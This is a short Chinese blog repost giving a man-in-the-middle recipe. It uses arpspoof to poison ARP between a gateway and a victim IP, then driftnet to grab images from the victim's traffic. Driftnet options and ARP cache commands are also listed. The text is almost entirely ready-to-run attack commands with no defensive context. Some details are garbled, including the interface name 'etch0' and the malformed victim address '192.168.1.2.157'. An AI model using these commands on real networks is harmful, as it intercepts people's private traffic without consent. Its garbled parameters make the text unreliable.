中间人攻击 图片

arpspoof -i etch0(攻击者网卡) -t 192.168.2.1(网关) 192.168.1.2.157(被攻击者IP)

 

监控  driftnet -i etch0

 

查看本地arp缓存  arp -a

清除arp缓存 arp -d

 

 

语法: driftnet   [options]   [filter code]

主要参数:

 -b               捕获到新的图片时发出嘟嘟声

-i  interface     选择监听接口

-f  file   读取一个指定pcap数据包中的图片

-p  不让所监听的接口使用混杂模式

-a  后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)

-m number 指定保存图片数的数目

-d directory  指定保存图片的路径

-x prefix  指定保存图片的前缀名

使用举例:

1.实时监听: driftnet -i wlan0

2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
---------------------  
作者:iteye_3978  
来源:CSDN  
原文:https://blog.csdn.net/iteye_3978/article/details/82677558  
版权声明:本文为博主原创文章,转载请附上博文链接!

posted @ 2019-04-15 00:00  时光途径  阅读(225)  评论(0编辑  收藏  举报